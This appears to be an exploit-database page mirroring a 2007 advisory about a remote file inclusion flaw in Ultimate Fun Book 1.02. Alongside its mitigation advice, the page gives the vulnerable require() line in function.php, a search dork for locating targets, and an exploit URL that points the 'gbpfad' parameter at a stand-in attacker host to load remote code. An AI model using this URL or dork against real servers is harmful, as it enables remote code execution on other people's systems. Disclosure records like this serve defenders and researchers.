header-logo
Suggest Exploit
vendor:
Ultimate Fun Book
by:
kezzap66345
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Ultimate Fun Book
Affected Version From: Ultimate Fun Book 1.02
Affected Version To: Ultimate Fun Book 1.02
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Ultimate Fun Book 1.02

The exploit allows an attacker to include remote files by manipulating the 'gbpfad' parameter in the 'function.php' file. By providing a malicious URL in the 'gbpfad' parameter, the attacker can execute arbitrary code on the target server.

Mitigation:

The vulnerability can be mitigated by validating user input and using proper input sanitization techniques. Additionally, ensuring that the 'gbpfad' parameter is not directly used in file inclusion operations can help prevent this type of attack.
Source

Exploit-DB raw data:

****Ultimate Fun Book 1.02****
**found by:kezzap66345
**contant= [:(]
**download script=http://www.ultimate-fun-board.de
**dork:Ultimate-Fun-Book 1.02

file:

function.php

code:

<?php
require($gbpfad."/config.php");

exploit:

http://target/path/function.php?gbpfad=http://evil[script]

*********thanx= x0r0n,str0ke,shakia***********
*****************************************

# milw0rm.com [2007-02-20]

Navigation

Suggest Exploit

Services By CQR